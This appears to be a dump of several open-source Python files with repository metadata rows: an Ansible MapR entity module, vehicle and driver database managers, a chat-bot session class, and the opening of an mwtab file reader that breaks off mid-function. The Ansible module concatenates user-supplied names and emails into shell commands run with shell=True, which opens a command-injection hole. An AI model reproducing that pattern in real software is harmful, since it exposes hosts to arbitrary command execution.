initial["end_time"] = self.object.end_time.astimezone(
PACIFIC_TIMEZONE
).strftime(DATETIME_12_HOUR_FORMAT)
return initial
def form_valid(self, form):
if "rsvp_limit" in form.changed_data:
messages.success(
self.request,
"People who rsvp'd or are on the waitlist are not notified"
" when you change the rsvp limit. Be sure to make an announcement!",
)
return super().form_valid(form)
| 480 | 637 | 22 |
e71d446c2173eb797a2b7e29df4a14d48d6548ac | 7,353 | py | Python | library/mapr_entity.py | jaideepjoshi/ezmeral-orock-ansible | 6debe998cfd613ecf8a91d242e298b5b6822d936 | [
"Apache-2.0"
] | 35 | 2017-12-10T22:03:48.000Z | 2020-09-15T12:05:24.000Z | library/mapr_entity.py | jaideepjoshi/ezmeral-orock-ansible | 6debe998cfd613ecf8a91d242e298b5b6822d936 | [
"Apache-2.0"
] | 105 | 2017-11-28T10:13:23.000Z | 2022-01-07T00:33:21.000Z | library/mapr_entity.py | jaideepjoshi/ezmeral-orock-ansible | 6debe998cfd613ecf8a91d242e298b5b6822d936 | [
"Apache-2.0"
] | 53 | 2017-02-02T13:18:33.000Z | 2022-03-22T20:25:24.000Z | #!/usr/bin/python
ANSIBLE_METADATA = {
'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: mapr_entity
short_description: This module manages MapR accountable entities
version_added: "2.4"
description:
- "This module manages MapR accountable entities"
options:
name:
description:
- Entity name
required: true
type:
description:
- entity type: user or group
required: true
email:
description:
- Contact email for entity
required: false
soft_quota_in_mb:
description:
- Advisory quota in MB. Zero value means no quota. - default: 0
required: false
hard_quota_in_mb:
description:
- Hard quota in MB. Zero value means no quota. - default: 0
required: false
author:
- Carsten Hufe chufe@mapr.com
'''
EXAMPLES = '''
# Pass in a message
- name: Modify MapR entity
mapr_entity:
name: mapr
type: user
email: abc@email.com
soft_quota_in_mb: 1024
hard_quota_in_mb: 1024
'''
RETURN = '''
original_message:
description: The original name param that was passed in
type: str
message:
description: The output message that the sample module generates
'''
from ansible.module_utils.basic import AnsibleModule
import subprocess
import json
import getpass
import tempfile
def execute_entity_creation(type, name):
'''
Create a temporary volume and assign the user/group defined by type, name as accountable entity
'''
temp_volume_name = create_temp_volume(type, name)
remove_temp_volume(temp_volume_name)
if __name__ == '__main__':
main()
| 31.55794 | 143 | 0.636339 | #!/usr/bin/python
ANSIBLE_METADATA = {
'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: mapr_entity
short_description: This module manages MapR accountable entities
version_added: "2.4"
description:
- "This module manages MapR accountable entities"
options:
name:
description:
- Entity name
required: true
type:
description:
- entity type: user or group
required: true
email:
description:
- Contact email for entity
required: false
soft_quota_in_mb:
description:
- Advisory quota in MB. Zero value means no quota. - default: 0
required: false
hard_quota_in_mb:
description:
- Hard quota in MB. Zero value means no quota. - default: 0
required: false
author:
- Carsten Hufe chufe@mapr.com
'''
EXAMPLES = '''
# Pass in a message
- name: Modify MapR entity
mapr_entity:
name: mapr
type: user
email: abc@email.com
soft_quota_in_mb: 1024
hard_quota_in_mb: 1024
'''
RETURN = '''
original_message:
description: The original name param that was passed in
type: str
message:
description: The output message that the sample module generates
'''
from ansible.module_utils.basic import AnsibleModule
import subprocess
import json
import getpass
import tempfile
def run_module():
# define the available arguments/parameters that a user can pass to
# the module
module_args = dict(
type=dict(type='str', required=True),
name=dict(type='str', required=True),
email=dict(type='str', required=False, default=''),
soft_quota_in_mb=dict(type='int', required=False, default='0'),
hard_quota_in_mb=dict(type='int', required=False, default='0')
)
result = dict(
changed=False,
original_message='No changes',
message='No changes'
)
module = AnsibleModule(
argument_spec=module_args,
supports_check_mode=True
)
entity_info = get_entity_info(module.params['type'], module.params['name'])
if entity_info == None:
entity_exists = False
old_values = dict()
# module.fail_json(msg="Accountable entity " + module.params['name'] + " does not exist.", **result)
else:
entity_exists = True
old_values = dict(
name = entity_info['EntityName'].encode('ascii','ignore'),
type = "user" if int(entity_info['EntityType']) == 0 else 'group',
email = (entity_info['EntityEmail'].encode('ascii','ignore') if 'EntityEmail' in entity_info else ''),
soft_quota_in_mb = int(entity_info['EntityAdvisoryquota']),
hard_quota_in_mb = int(entity_info['EntityQuota'])
)
new_values = dict(
name = module.params['name'],
type = module.params['type'],
email = module.params['email'],
soft_quota_in_mb = module.params['soft_quota_in_mb'],
hard_quota_in_mb = module.params['hard_quota_in_mb']
)
if entity_exists:
for key in set(old_values.keys() + new_values.keys()):
if old_values[key] != new_values[key]:
result['changed'] = True
result['original_message'] = "Entity " + module.params['name'] + " exists - values updated"
result['message'] = result['original_message']
break
else:
result['changed'] = True
result['original_message'] = "New entity " + module.params['name'] + " created"
result['message'] = result['original_message']
result['diff'] = dict()
result['diff']['before'] = build_compare_str(old_values)
result['diff']['after'] = build_compare_str(new_values)
if not module.check_mode and result['changed']:
if not entity_exists:
execute_entity_creation(new_values['type'], new_values['name'])
# execute changes
execute_entity_changes(new_values['type'], new_values['name'], new_values)
module.exit_json(**result)
def build_compare_str(values):
result = ""
for key in values:
result += (key + "=" + str(values[key]) + "\n")
return result
def get_entity_info(type, name):
converted_type = "0" if type == "user" else "1"
process = subprocess.Popen("maprcli entity info -name " + name + " -type " + converted_type + " -json", shell=True, stdout=subprocess.PIPE)
entity_info = process.communicate()
maprclijson = json.loads(entity_info[0])
if 'data' in maprclijson and len(maprclijson['data']) > 0:
return maprclijson['data'][0]
else:
return None
def load_volume_names():
volume_names = []
maprcli_proc = subprocess.Popen('maprcli volume list -columns n -json', shell=True, stdout=subprocess.PIPE)
proc_stdout = maprcli_proc.communicate()
proc_json = json.loads(proc_stdout[0])
for volume in proc_json['data']:
volume_names.append(str(volume['volumename']))
return volume_names
def suggest_temp_volume_name():
volume_names = load_volume_names()
while True:
tmp_volume_name = 'taec.' + next(tempfile._get_candidate_names())
volume_name_already_taken = False
for volume_name in volume_names:
if str(volume_name) == tmp_volume_name:
volume_name_already_taken = True
break
if volume_name_already_taken == False:
break
return tmp_volume_name
def create_temp_volume(type, name):
failed_counter = 0
while failed_counter < 5:
tmp_volume_name = suggest_temp_volume_name()
maprcli_cmd = 'maprcli volume create'
maprcli_cmd += ' -name ' + tmp_volume_name
maprcli_cmd += ' -ae ' + name
maprcli_cmd += ' -aetype ' + ('0' if type == 'user' else '1')
maprcli_vol_create = subprocess.Popen(maprcli_cmd, shell=True)
exitcode = maprcli_vol_create.wait()
if exitcode != 0:
failed_counter += 1
else:
return tmp_volume_name;
raise RuntimeError('Could not create temporary volume!')
def remove_temp_volume(volume_name):
failed_counter = 0
while failed_counter < 5:
maprcli_vol_remove = subprocess.Popen('maprcli volume remove -name ' + volume_name, shell=True)
exitcode = maprcli_vol_remove.wait()
if exitcode != 0:
failed_counter += 1
else:
return
raise RuntimeError('Could not remove temporary volume ' + volume_name + '!')
def execute_entity_creation(type, name):
'''
Create a temporary volume and assign the user/group defined by type, name as accountable entity
'''
temp_volume_name = create_temp_volume(type, name)
remove_temp_volume(temp_volume_name)
def execute_entity_changes(type, name, new_values):
update_cmd = "maprcli entity modify"
update_cmd += " -type " + ("0" if type == "user" else "1")
update_cmd += " -name " + name
update_cmd += " -email '" + new_values['email'] + "'"
update_cmd += " -advisoryquota " + str(new_values['soft_quota_in_mb'])
update_cmd += " -quota " + str(new_values['hard_quota_in_mb'])
subprocess.check_call(update_cmd, shell=True)
def main():
run_module()
if __name__ == '__main__':
main()
| 5,414 | 0 | 207 |
31e32c129aa7d92384a69bef1420f94126542831 | 17,313 | py | Python | app/vehicle/managers.py | ab7289-tandon-nyu/csgy6083_PDS_Project | d2b7d22274dcabbb6ae35c17a8ffd06498f3634f | [
"MIT"
] | null | null | null | app/vehicle/managers.py | ab7289-tandon-nyu/csgy6083_PDS_Project | d2b7d22274dcabbb6ae35c17a8ffd06498f3634f | [
"MIT"
] | null | null | null | app/vehicle/managers.py | ab7289-tandon-nyu/csgy6083_PDS_Project | d2b7d22274dcabbb6ae35c17a8ffd06498f3634f | [
"MIT"
] | null | null | null | from typing import List, Optional
from jinjasql import JinjaSql
from app.db import DBManager
from app.vehicle.models import Driver, Vehicle
| 38.473333 | 119 | 0.39866 | from typing import List, Optional
from jinjasql import JinjaSql
from app.db import DBManager
from app.vehicle.models import Driver, Vehicle
class VehicleManager(DBManager):
def get_by_id(self, vin: str) -> Optional[Vehicle]:
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = (
"SELECT `make`, `model`, "
"`year`, `state`, `policy_id`, `vin` "
"FROM `ab_vehicle` "
"WHERE `vin`=%s"
)
result = None
try:
cursor.execute(sql, (vin,))
result = cursor.fetchone()
except Exception as ex:
print(
f"There was a DB error when trying to retrieve Vehicle {vin}. EX: {ex}",
flush=True,
)
return None
if not result:
print(f"No vehicle found for id: {vin}", flush=True)
return None
return Vehicle(**result)
def get_by_ids(self, vins: List[str]) -> Optional[List[Vehicle]]:
"""Returns a list of Vehicles matching the supplied VINs"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
# see https://stackoverflow.com/questions/589284/imploding-a-list-for-use-in-a-python-mysqldb-in-clause
placeholders = ",".join(["%s"] * len(vins))
sql = (
"SELECT `make`, `model`, "
"`year`, `state`, `policy_id`, `vin` "
"FROM `ab_vehicle` "
f"WHERE `vin` IN ({placeholders})"
)
results = None
try:
cursor.execute(sql, tuple(vins))
results = cursor.fetchall()
except Exception as ex:
print(
f"There was a DB Error when retrieving vehicles: {vins}.\nEX: {ex}",
flush=True,
)
return None
if not results:
print(
f"No Vehicles found for following list of VINs: {vins}",
flush=True,
)
return None
return [Vehicle(**result) for result in results]
def get_by_policy(self, policy_id: int) -> Optional[List[Vehicle]]:
"""Retrieves a list of Vehicles associated with the specified policy"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = (
"SELECT `make`, `model`, "
"`year`, `state`, `policy_id`, `vin` "
"FROM `ab_vehicle` "
"WHERE `policy_id`=%s"
)
results = None
try:
cursor.execute(sql, (policy_id,))
results = cursor.fetchall()
except Exception as ex:
print(
f"There was a DB error when retrieving Vehicles for policy: {policy_id}. EX: {ex}",
flush=True,
)
return None
if not results:
print(
f"No Vehicles found associated with policy: {policy_id}",
flush=True,
)
return None
return [Vehicle(**result) for result in results]
def create(self, vehicle: Vehicle) -> Optional[str]:
"""Creates a new Vehicle record and returns its PK"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = (
"INSERT INTO `ab_vehicle` "
"(`make`, `model`, `year`, `state`, `policy_id`, `vin`) "
"VALUES "
"(%s, %s, %s, %s, %s, %s);"
)
try:
cursor.execute(
sql,
(
vehicle.make,
vehicle.model,
vehicle.year,
vehicle.state,
vehicle.policy_id,
vehicle.vin,
),
)
conn.commit()
except Exception as ex:
print(
f"There was a DB error when trying to insert a new vehicle. EX: {ex}",
flush=True,
)
return None
return vehicle.vin
def update(self, vehicle: Vehicle) -> bool:
"""Updates the vehicle record in the DB"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = (
"UPDATE `ab_vehicle` SET "
"`make`=%s, "
"`model`=%s, "
"`year`=%s, "
"`state`=%s "
"WHERE `vin`=%s;"
)
try:
cursor.execute(
sql,
(
vehicle.make,
vehicle.model,
vehicle.year,
vehicle.state,
vehicle.vin,
),
)
conn.commit()
except Exception as ex:
print(
f"There was a DB error when updating vehicle {vehicle.vin}. EX: {ex}",
flush=True,
)
return False
return True
def delete(self, vin: str) -> bool:
"""deletes the vehicle with the specified ID"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = "DELETE FROM `ab_vehicle` WHERE `vin`=%s"
try:
print(f"Deleting vin: {vin}", flush=True)
cursor.execute(sql, (vin,))
conn.commit()
except Exception as ex:
print(
f"There was a DB error when trying to delete vehicle {vin}. EX: {ex}",
flush=True,
)
return False
print("deleted succeeded", flush=True)
return True
class DriverManager(DBManager):
def get_by_id(self, license: str) -> Optional[Driver]:
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = (
"SELECT `fname`, `mname`, "
"`lname`, `birthdate`, `license` "
"FROM `ab_driver` "
"WHERE `license`=%s"
)
result = None
try:
cursor.execute(sql, (license,))
result = cursor.fetchone()
except Exception as ex:
print(
f"There was a DB error when trying to retrieve driver {license}. EX: {ex}",
flush=True,
)
return None
if not result:
print(f"No driver found for id: {license}", flush=True)
return None
return Driver(**result)
def get_by_ids(self, licenses: List[str]) -> Optional[List[Driver]]:
"""Returns a list of Drivers matching the supplied licenses"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
# see https://stackoverflow.com/questions/589284/imploding-a-list-for-use-in-a-python-mysqldb-in-clause
placeholders = ",".join(["%s"] * len(licenses))
sql = (
"SELECT `fname`, `mname`, "
"`lname`, `birthdate`, `license` "
"FROM `ab_driver` "
f"WHERE `license` IN ({placeholders})"
)
results = None
try:
cursor.execute(sql, tuple(licenses))
results = cursor.fetchall()
except Exception as ex:
print(
f"There was a DB Error when retrieving drivers: {licenses}.\nEX: {ex}",
flush=True,
)
return None
if not results:
print(
f"No drivers found for following list of licenses: {licenses}",
flush=True,
)
return None
return [Driver(**result) for result in results]
def create(self, driver: Driver) -> Optional[str]:
"""Creates a new Driver record and returns its PK"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = (
"INSERT INTO `ab_driver` "
"(`fname`, `mname`, `lname`, `birthdate`, `license`) "
"VALUES "
"(%s, %s, %s, %s, %s);"
)
try:
cursor.execute(
sql,
(
driver.fname,
driver.mname,
driver.lname,
driver.birthdate,
driver.license,
),
)
conn.commit()
except Exception as ex:
print(
f"There was a DB error when trying to insert a new driver. EX: {ex}",
flush=True,
)
return None
return driver.license
def update(self, driver: Driver) -> bool:
"""Updates the driver record in the DB"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = (
"UPDATE `ab_driver` SET "
"`fname`=%s, "
"`mname`=%s, "
"`lname`=%s, "
"`birthdate`=%s "
"WHERE `license`=%s;"
)
try:
cursor.execute(
sql,
(
driver.fname,
driver.mname,
driver.lname,
driver.birthdate,
driver.license,
),
)
conn.commit()
except Exception as ex:
print(
f"There was a DB error when updating driver {driver.license}. EX: {ex}",
flush=True,
)
return False
return True
def delete(self, license: str) -> bool:
"""deletes the driver with the specified ID"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = "DELETE FROM `ab_driver` WHERE `license`=%s;"
try:
cursor.execute(sql, (license,))
conn.commit()
except Exception as ex:
print(
f"There was a DB error when trying to delete driver {license}. EX: {ex}",
flush=True,
)
return False
return True
class VDManager(DBManager):
def __init__(self):
super().__init__()
def get_vehicles_for_driver(
self, license: str, complement: bool = False
) -> Optional[List[Vehicle]]:
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql_template = """
SELECT
`v`.`make`, `v`.`model`, `v`.`year`, `v`.`state`, `v`.`policy_id`, `v`.`vin`
FROM `ab_vehicle` v
JOIN `ab_driver_vehicle` dv ON `v`.`vin` = `dv`.`vin`
JOIN `ab_driver` d ON `dv`.`license` = `d`.`license`
{% if complement %}
WHERE `d`.`license` != {{ license }}
{% else %}
WHERE `d`.`license` = {{ license }}
{% endif %}
"""
query, bind_params = JinjaSql().prepare_query(
sql_template, {"complement": complement, "license": license}
)
results = None
try:
cursor.execute(query, bind_params)
results = cursor.fetchall()
except Exception as ex:
print(
f"There was a DB error when retrieving vehicles for driver {license}. EX: {ex}",
flush=True,
)
return None
if results is None:
print(
f"Didn't find any vehicles associated with license {license}",
flush=True,
)
return [Vehicle(**result) for result in results]
def get_drivers_for_vehicle(
self, vin: str, complement: bool = False
) -> Optional[List[Driver]]:
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql_template = """
SELECT
`d`.`fname`, `d`.`mname`, `d`.`lname`, `d`.`birthdate`, `d`.`license`
FROM `ab_driver` d
JOIN `ab_driver_vehicle` dv ON `d`.`license` = `dv`.`license`
JOIN `ab_vehicle` v ON `dv`.`vin` = `v`.`vin`
{% if complement %}
WHERE `v`.`vin` != {{ vin }}
{% else %}
WHERE `v`.`vin` = {{ vin }}
{% endif %}
"""
query, bind_params = JinjaSql().prepare_query(
sql_template, {"complement": complement, "vin": vin}
)
results = None
try:
cursor.execute(query, bind_params)
results = cursor.fetchall()
except Exception as ex:
print(
f"There was a DB error when retrieving drivers for vehicle {vin}. EX: {ex}",
flush=True,
)
return None
if results is None:
print(
f"Did not return any drivers associated with vehicle {vin}",
flush=True,
)
return None
return [Driver(**result) for result in results]
def add_relation(self, vin: str, license: str) -> bool:
"""creates a new relation between the specified driver and vehicle"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = (
"INSERT INTO `ab_driver_vehicle` (`vin`, `license`) "
"VALUES (%s, %s)"
)
try:
cursor.execute(
sql,
(
vin,
license,
),
)
conn.commit()
except Exception as ex:
print(
"There was a DB Error when creating a relation between "
f"vin {vin} and license {license}. EX: {ex}",
flush=True,
)
return False
return True
def delete_relation(self, vin: str, license: str) -> bool:
"""Removes a relation between the specified driver and vehicle"""
with self.get_connection() as conn:
with conn.cursor() as cursor:
sql = "DELETE FROM `ab_driver_vehicle` WHERE `vin`=%s AND `license`=%s"
try:
cursor.execute(
sql,
(
vin,
license,
),
)
conn.commit()
except Exception as ex:
print(
"There was a DB error when trying to remove relation between "
f"vin {vin} and license {license}. EX: {ex}",
flush=True,
)
return False
return True
| 5,112 | 11,987 | 69 |
8c945debc7403eef7d5bb53554f95856e8985e78 | 79 | py | Python | abc240/b/test.py | seigot/atcoder | 6c2da684c75b7c5de162de3713a13507aeecce1d | [
"MIT"
] | 2 | 2021-12-28T11:43:47.000Z | 2022-02-20T14:41:27.000Z | abc240/b/test.py | seigot/atcoder | 6c2da684c75b7c5de162de3713a13507aeecce1d | [
"MIT"
] | null | null | null | abc240/b/test.py | seigot/atcoder | 6c2da684c75b7c5de162de3713a13507aeecce1d | [
"MIT"
] | null | null | null | n = input()
arr = list(map(int, input().split()))
s = set(arr)
print(len(s))
| 13.166667 | 37 | 0.56962 | n = input()
arr = list(map(int, input().split()))
s = set(arr)
print(len(s))
| 0 | 0 | 0 |
c6b099c2eeccca6fd594c51318bc6cd9faebc7ab | 41 | py | Python | src/pruebas.py | edoomm/compiladores | f8badd2f44e4e0273161266f739aab7c1ca5dfb2 | [
"MIT"
] | 1 | 2021-03-23T14:22:26.000Z | 2021-03-23T14:22:26.000Z | src/pruebas.py | edoomm/compiladores | f8badd2f44e4e0273161266f739aab7c1ca5dfb2 | [
"MIT"
] | null | null | null | src/pruebas.py | edoomm/compiladores | f8badd2f44e4e0273161266f739aab7c1ca5dfb2 | [
"MIT"
] | null | null | null |
for i in range(255):
print(chr(i))
| 8.2 | 20 | 0.560976 |
for i in range(255):
print(chr(i))
| 0 | 0 | 0 |
5b15f03a9e21ad9e630b8c38b2ac80ff1cf06549 | 4,625 | py | Python | lib/session.py | Hiteshsuhas/err-stackstorm | 7579350ac50d9324b64a73b86d57e094270cb275 | [
"Apache-2.0"
] | 15 | 2016-09-19T12:06:12.000Z | 2021-11-30T12:04:44.000Z | lib/session.py | Hiteshsuhas/err-stackstorm | 7579350ac50d9324b64a73b86d57e094270cb275 | [
"Apache-2.0"
] | 22 | 2017-06-19T18:13:54.000Z | 2021-05-28T09:25:01.000Z | lib/session.py | Hiteshsuhas/err-stackstorm | 7579350ac50d9324b64a73b86d57e094270cb275 | [
"Apache-2.0"
] | 7 | 2017-06-19T17:03:59.000Z | 2021-09-27T11:06:31.000Z | # coding:utf-8
import uuid
import string
import hashlib
import logging
from lib.errors import SessionExpiredError, SessionConsumedError
from datetime import datetime as dt
from random import SystemRandom
LOG = logging.getLogger("errbot.plugin.st2.session")
| 34.774436 | 99 | 0.611676 | # coding:utf-8
import uuid
import string
import hashlib
import logging
from lib.errors import SessionExpiredError, SessionConsumedError
from datetime import datetime as dt
from random import SystemRandom
LOG = logging.getLogger("errbot.plugin.st2.session")
def generate_password(length=8):
rnd = SystemRandom()
if length > 255:
length = 255
return "".join([rnd.choice(string.hexdigits) for _ in range(length)])
class Session(object):
def __init__(self, user_id, user_secret, session_ttl=3600):
self.bot_secret = None
self.user_id = user_id
self._is_sealed = True
self.session_id = uuid.uuid4()
self.create_date = int(dt.now().timestamp())
self.modified_date = self.create_date
self.ttl_in_seconds = session_ttl
self._hashed_secret = self.hash_secret(user_secret)
del user_secret
def is_expired(self):
"""
Returns False if both create and modified timestamps have exceeded the ttl.
"""
now = int(dt.now().timestamp())
modified_expiry = self.modified_date + self.ttl_in_seconds
if modified_expiry < now:
raise SessionExpiredError
return False
def attributes(self):
return {
"UserID": self.user_id,
"IsSealed": self._is_sealed,
"SessionID": self.session_id,
"CreationDate": str(dt.fromtimestamp(self.create_date)),
"ModifiedDate": str(dt.fromtimestamp(self.modified_date)),
"ExpiryDate": str(dt.fromtimestamp(self.modified_date + self.ttl_in_seconds)),
}
def __repr__(self):
return " ".join(
[
"UserID: {},".format(str(self.user_id)),
"Is Sealed: {},".format(str(self._is_sealed)),
"SessionID: {},".format(str(self.session_id)),
"Creation Date: {},".format(str(dt.fromtimestamp(self.create_date))),
"Modified Date: {},".format(str(dt.fromtimestamp(self.modified_date))),
"Expiry Date: {}".format(
str(dt.fromtimestamp(self.modified_date + self.ttl_in_seconds))
),
]
)
def unseal(self):
"""
Mark the session as being consumed. Returns true if the session was available to be
consumed or raises SessionConsumedError if the session has already been marked as consumed.
"""
self.is_expired()
if self._is_sealed:
self._is_sealed = False
else:
raise SessionConsumedError
return True
def is_sealed(self):
"""
Query the state of the one time use flag.
Returns True if the session has not been consumed or False if the session has already been
consumed.
"""
self.is_expired()
return self._is_sealed
def id(self):
"""
Return the UUID for the session.
"""
return str(self.session_id)
def ttl(self, ttl=None):
"""
Get/Set the time to live for the session.
param: ttl[int] The number of seconds the session should remain valid since creation or
modification.
Returns the number of seconds the ttl has been set to if no agrument is provided otherwise
the ttl is set to the number of seconds provided to the ttl argument.
"""
self.is_expired()
if ttl is None:
return self.ttl_in_seconds
if isinstance(ttl, int):
self.ttl_in_seconds = ttl
self.modified_date = int(dt.now().timestamp())
else:
LOG.warning("session ttl must be an integer type, got '{}'".format(ttl))
def hash_secret(self, user_secret):
"""
Generate a unique token by hashing a random bot secret with the user secrets.
param: user_secret[string] - The users secret provided in the chat backend.
"""
self.is_expired()
if self.bot_secret is None:
self.bot_secret = generate_password(8)
h = hashlib.sha256()
h.update(bytes(user_secret, "utf-8"))
del user_secret
h.update(bytes(self.bot_secret, "utf-8"))
return h.hexdigest()
def match_secret(self, user_secret):
"""
Compare a secret with the session's hashed secret.
param: user_secret[string] the secret to compare.
Return True if the user_secret hash has matches the session hash or False if it does not.
"""
self.is_expired()
return self._hashed_secret == self.hash_secret(user_secret)
| 1,487 | 2,832 | 46 |
66388d70125d6d722d8baaab807b4f12201dcdd0 | 7,710 | py | Python | mwtab/fileio.py | MoseleyBioinformaticsLab/mwtab | 1bc1e3715538348b29a5760a9c3184fe04f568a6 | [
"BSD-3-Clause-Clear"
] | 7 | 2018-02-02T07:50:20.000Z | 2021-03-14T22:46:58.000Z | mwtab/fileio.py | MoseleyBioinformaticsLab/mwtab | 1bc1e3715538348b29a5760a9c3184fe04f568a6 | [
"BSD-3-Clause-Clear"
] | 2 | 2019-02-14T08:38:54.000Z | 2020-02-19T08:08:02.000Z | mwtab/fileio.py | MoseleyBioinformaticsLab/mwtab | 1bc1e3715538348b29a5760a9c3184fe04f568a6 | [
"BSD-3-Clause-Clear"
] | 1 | 2019-10-12T23:38:44.000Z | 2019-10-12T23:38:44.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
mwtab.fileio
~~~~~~~~~~~~
This module provides routines for reading ``mwTab`` formatted files
from difference kinds of sources:
* Single ``mwTab`` formatted file on a local machine.
* Directory containing multiple ``mwTab`` formatted files.
* Compressed zip/tar archive of ``mwTab`` formatted files.
* URL address of ``mwTab`` formatted file.
* ``ANALYSIS_ID`` of ``mwTab`` formatted file.
"""
import os
import io
import zipfile
import tarfile
import bz2
import gzip
from re import match
from . import mwtab
from . import validator
from . import mwschema
from . import mwrest
from urllib.request import urlopen
from urllib.parse import urlparse
VERBOSE = False
def _generate_filenames(sources):
"""Generate filenames.
:param tuple sources: Sequence of strings representing path to file(s).
:return: Path to file(s).
:rtype: :py:class:`str`
"""
for source in sources:
if os.path.isdir(source):
for path, _, filelist in os.walk(source):
for fname in filelist:
if os.path.splitext(fname)[1].lower() in {".csv", ".txt", ".json"}:
if GenericFilePath.is_compressed(fname):
if VERBOSE:
print("Skipping compressed file: {}".format(os.path.abspath(fname)))
continue
else:
yield os.path.join(path, fname)
elif os.path.isfile(source):
yield source
elif source.isdigit():
yield next(mwrest.generate_mwtab_urls([source]))
# TODO: Add ST parsing
elif match(r"(AN[0-9]{6}$)", source):
yield next(mwrest.generate_mwtab_urls([source]))
elif GenericFilePath.is_url(source):
yield source
else:
raise TypeError("Unknown file source.")
def _generate_handles(filenames):
"""Open a sequence of filenames one at time producing file objects.
The file is closed immediately when proceeding to the next iteration.
:param generator filenames: Generator object that yields the path to each file, one at a time.
:return: Filehandle to be processed into an instance.
"""
for fname in filenames:
path = GenericFilePath(fname)
for filehandle, source in path.open():
yield filehandle, source
filehandle.close()
def read_files(*sources, **kwds):
"""Construct a generator that yields file instances.
:param sources: One or more strings representing path to file(s).
"""
filenames = _generate_filenames(sources)
filehandles = _generate_handles(filenames)
for fh, source in filehandles:
try:
f = mwtab.MWTabFile(source)
f.read(fh)
if kwds.get('validate'):
validator.validate_file(mwtabfile=f,
section_schema_mapping=mwschema.section_schema_mapping)
if VERBOSE:
print("Processed file: {}".format(os.path.abspath(source)))
yield f
except Exception as e:
if VERBOSE:
print("Error processing file: ", os.path.abspath(source), "\nReason:", e)
raise e
def read_mwrest(*sources, **kwds):
"""Construct a generator that yields file instances.
:param sources: One or more strings representing path to file(s).
"""
filenames = _generate_filenames(sources)
filehandles = _generate_handles(filenames)
for fh, source in filehandles:
try:
f = mwrest.MWRESTFile(source)
f.read(fh)
if VERBOSE:
print("Processed url: {}".format(source))
yield f
except Exception as e:
if VERBOSE:
print("Error processing url: ", source, "\nReason:", e)
pass
class GenericFilePath(object):
"""`GenericFilePath` class knows how to open local files or files over URL."""
def __init__(self, path):
"""Initialize path.
:param str path: String representing a path to local file(s) or valid URL address of file(s).
"""
self.path = path
def open(self):
"""Generator that opens and yields filehandles using appropriate facilities:
test if path represents a local file or file over URL, if file is compressed
or not.
:return: Filehandle to be processed into an instance.
"""
is_url = self.is_url(self.path)
compression_type = self.is_compressed(self.path)
if not compression_type:
if is_url:
filehandle = urlopen(self.path)
else:
filehandle = open(self.path, "r", encoding="utf-8")
source = self.path
yield filehandle, source
filehandle.close()
elif compression_type:
if is_url:
response = urlopen(self.path)
path = response.read()
response.close()
else:
path = self.path
if compression_type == "zip":
ziparchive = zipfile.ZipFile(io.BytesIO(path), "r") if is_url else zipfile.ZipFile(path)
for name in ziparchive.infolist():
if not name.filename.endswith("/"):
filehandle = ziparchive.open(name)
source = self.path + "/" + name.filename
yield filehandle, source
filehandle.close()
elif compression_type in ("tar", "tar.bz2", "tar.gz"):
tararchive = tarfile.open(fileobj=io.BytesIO(path)) if is_url else tarfile.open(path)
for name in tararchive:
if name.isfile():
filehandle = tararchive.extractfile(name)
source = self.path + "/" + name.name
yield filehandle, source
filehandle.close()
elif compression_type == "bz2":
filehandle = bz2.BZ2File(io.BytesIO(path)) if is_url else bz2.BZ2File(path)
source = self.path
yield filehandle, source
filehandle.close()
elif compression_type == "gz":
filehandle = gzip.open(io.BytesIO(path)) if is_url else gzip.open(path)
source = self.path
yield filehandle, source
filehandle.close()
@staticmethod
def is_compressed(path):
"""Test if path represents compressed file(s).
:param str path: Path to file(s).
:return: String specifying compression type if compressed, "" otherwise.
:rtype: :py:class:`str`
"""
if path.endswith(".zip"):
return "zip"
elif path.endswith(".tar.gz"):
return "tar.gz"
elif path.endswith(".tar.bz2"):
return "tar.bz2"
elif path.endswith(".gz"):
return "gz"
elif path.endswith(".bz2"):
return "bz2"
elif path.endswith(".tar"):
return "tar"
return ""
@staticmethod
def is_url(path):
"""Test if path represents a valid URL.
:param str path: Path to file.
:return: True if path is valid url string, False otherwise.
:rtype: :py:obj:`True` or :py:obj:`False`
"""
try:
parse_result = urlparse(path)
return all((parse_result.scheme, parse_result.netloc, parse_result.path))
except ValueError:
return False
| 32.125 | 104 | 0.568742 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
mwtab.fileio
~~~~~~~~~~~~
This module provides routines for reading ``mwTab`` formatted files
from difference kinds of sources:
* Single ``mwTab`` formatted file on a local machine.
* Directory containing multiple ``mwTab`` formatted files.
* Compressed zip/tar archive of ``mwTab`` formatted files.
* URL address of ``mwTab`` formatted file.
* ``ANALYSIS_ID`` of ``mwTab`` formatted file.
"""
import os
import io
import zipfile
import tarfile
import bz2
import gzip
from re import match
from . import mwtab
from . import validator
from . import mwschema
from . import mwrest
from urllib.request import urlopen
from urllib.parse import urlparse
VERBOSE = False
def _generate_filenames(sources):
"""Generate filenames.
:param tuple sources: Sequence of strings representing path to file(s).
:return: Path to file(s).
:rtype: :py:class:`str`
"""
for source in sources:
if os.path.isdir(source):
for path, _, filelist in os.walk(source):
for fname in filelist:
if os.path.splitext(fname)[1].lower() in {".csv", ".txt", ".json"}:
if GenericFilePath.is_compressed(fname):
if VERBOSE:
print("Skipping compressed file: {}".format(os.path.abspath(fname)))
continue
else:
yield os.path.join(path, fname)
elif os.path.isfile(source):
yield source
elif source.isdigit():
yield next(mwrest.generate_mwtab_urls([source]))
# TODO: Add ST parsing
elif match(r"(AN[0-9]{6}$)", source):
yield next(mwrest.generate_mwtab_urls([source]))
elif GenericFilePath.is_url(source):
yield source
else:
